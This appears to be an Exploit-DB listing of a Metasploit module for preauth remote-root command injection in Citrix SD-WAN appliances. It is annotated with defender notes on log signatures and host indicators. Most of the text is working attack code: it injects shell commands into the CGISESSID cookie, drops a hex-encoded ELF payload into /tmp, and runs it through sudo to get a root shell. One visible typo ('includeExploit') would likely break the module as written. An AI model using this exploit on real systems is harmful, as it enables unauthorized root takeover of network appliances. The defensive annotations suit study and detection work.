Netscaler SD-WAN 9.1.2.26.561201 – Command Injection (Metasploit)

  • 作者: xort
    日期: 2017-07-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42345/
  • # Exploit Title: Citrix SD-WAN logout cookie preauth Remote Command Injection Vulnerability 
    # Date: 02/20/2017
    # Exploit Author: xort @ Critical Start
    # Vendor Homepage: www.citrix.com
    # Software Link: https://www.citrix.com/downloads/cloudbridge/
    # Version: 9.1.2.26.561201
    # Tested on: 9.1.2.26.561201 (OS partition 4.6)
    #
    # CVE : (awaiting cve)
    
    # vuln: CGISESSID Cookie parameter
    #associated vuln urls:
    # /global_data/ 
    #			/global_data/headerdata 
    #			/log
    #			/
    #			/r9-1-2-26-561201/configuration/ 
    #			/r9-1-2-26-561201/configuration/edit 
    #			/r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
    #
    # Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. 
    #
    # xort @ Critical Start
    
    require 'msf/core'
    
    # Metasploit module for the Citrix SD-WAN CGISESSID cookie command injection
    # described in the header comments above. The injection point (see
    # run_command) is the CGISESSID cookie on a POST to /global_data/ with
    # action=logout; the module wraps its text in backticks, which is what turns
    # the unsanitized `system` call named in 'Description' into command execution.
    #
    # Defender notes, drawn only from what this module sends:
    #   - a CGISESSID cookie whose value contains backticks (or any other shell
    #     metacharacter) is never a legitimate session id, so that pattern in web
    #     server / WAF logs is a direct signature for this traffic;
    #   - the module drops /tmp/n (CMD mode) or /tmp/m (payload mode), marks it
    #     755 and runs it through `sudo`, so new executables under /tmp and sudo
    #     invocations by the web-server account are the host-side indicators;
    #   - the header gives the affected range as <= 9.1.2.26.561201; the root
    #     cause is cookie data reaching a shell without validation or escaping.
    class MetasploitModule < Msf::Exploit::Remote
    	Rank = ExcellentRanking
    	# NOTE(review): missing space after `include` — Ruby reads this as a
    	# reference to an undefined name `includeExploit` and will almost certainly
    	# raise NameError when the class body is evaluated; the intent is presumably
    	# `include Msf::Exploit::Remote::Tcp`, matching the HttpClient line below.
    	includeExploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    
    	# Module metadata and options.
    	#
    	# @param info [Hash] module info merged by update_info (Metasploit convention)
    	# Options registered:
    	#   CMD   [String, optional, default ""] command text; when non-empty the
    	#         exploit method runs it instead of deploying the payload.
    	#   RPORT default 443 (no SSL option is registered here; the transport
    	#         setting is left to the HttpClient mixin defaults).
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
    					'Description'=> %q{
    					This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
    			},
    			'Author' =>
    				[
    					'xort@Critical Start', # vuln + metasploit module
    				],
    			'Version'=> '$Revision: 1 $',
    			# No advisory or CVE reference is recorded (header says "awaiting cve").
    			'References' =>
    				[
    					[ 'none', 'none'],
    				],
    			'Platform'=> [ 'linux'],
    			# Privileged: the dropped file is executed via sudo (see exploit).
    			'Privileged' => true,
    			 'Arch'=> [ ARCH_X86 ],
    'SessionTypes'=> [ 'shell' ],
    		'Payload'=>
    { 
    'Compat' =>
    {
    'ConnectionType' => 'find',
    }
    },
    
    			'Targets'=>
    				[
    					['Linux Universal',
    						{
    								'Arch' => ARCH_X86,
    								'Platform' => 'linux'
    						}
    					],
    				],
    			'DefaultTarget' => 0))
    
    			register_options(
    				[
    					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
    					Opt::RPORT(443),
    				], self.class)
    	end
    
    	# Sends one injected command.
    	#
    	# The command is placed verbatim inside backticks in the CGISESSID cookie of
    	# a POST to /global_data/ (action=logout), alongside a fixed
    	# APNConfigEditorSession value. The response is never inspected, so the
    	# caller gets no success/failure signal; the method's value is whatever
    	# sleep(2) returns (an Integer), not the response.
    	#
    	# @param cmd [String] shell text; because it is inserted unescaped, a
    	#   command containing a backtick, newline or semicolon would break the
    	#   cookie — presumably why the caller hex-encodes its data first.
    	# @return [Integer] result of the trailing sleep(2)
    	def run_command(cmd)
    
    		vprint_status( "Running Command...\n" )
    
    		# send request with payload	
    		res = send_request_cgi({
    			'method' => 'POST',
    'uri' => "/global_data/",
    			'vars_post' => {
    				'action' => 'logout'
    			},
     	'headers' => {
    	'Connection' => 'close',
    	# Injection point: the backticks around cmd are what the vulnerable
    	# session check passes to the shell. The fixed hex prefix is not a real
    	# session id, which is itself a detectable anomaly.
    	'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
    }
    
    		})
    
    
    		# pause to let things run smoothly
    		sleep(2)
    
    
    	end
    
    	
    	# Entry point. Two modes, chosen by the CMD option:
    	#   CMD non-empty -> the command text is hex-encoded, written to /tmp/n
    	#                    with `echo -e`, chmod 755 and run via sudo
    	#                    (three requests, no result is read back);
    	#   CMD empty     -> payload.raw is wrapped in a Linux x86 ELF and handled
    	#                    the same way as /tmp/m, then `handler` waits for the
    	#                    payload to connect.
    	# Each byte of the data is rewritten as a backslash-escaped \xHH sequence;
    	# the multiple backslash layers in the replacement string presumably
    	# survive shell unquoting inside the backticks so that `echo -e` sees \xHH.
    	# `timeout` is assigned but never read. The `if not ... and not ...` test
    	# is equivalent to `datastore['CMD'] && !datastore['CMD'].empty?`.
    	# NOTE(review): `sudo` is used with no password handling, which suggests
    	# the web-server account on affected appliances can sudo without a
    	# password — sudoers on the appliance is a second thing for defenders to audit.
    	def exploit
    		# timeout
    		timeout = 1550;
    
    		# pause to let things run smoothly
    		sleep(2)
    
    		 #if no 'CMD' string - add code for root shell
    if not datastore['CMD'].nil? and not datastore['CMD'].empty?
    
    cmd = datastore['CMD']
    
    # Encode cmd payload
    
    encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
    
    			# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
    run_command("echo -e #{encoded_cmd}>/tmp/n")
    run_command("chmod 755 /tmp/n")
    run_command("sudo /tmp/n")
    else
    # Encode payload to ELF file for deployment
    elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
    
    			# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
    run_command("echo -e #{encoded_elf}>/tmp/m")
    run_command("chmod 755 /tmp/m")
    run_command("sudo /tmp/m")
    
    			# wait for magic
    handler
    			
    end
    
    
    	end
    end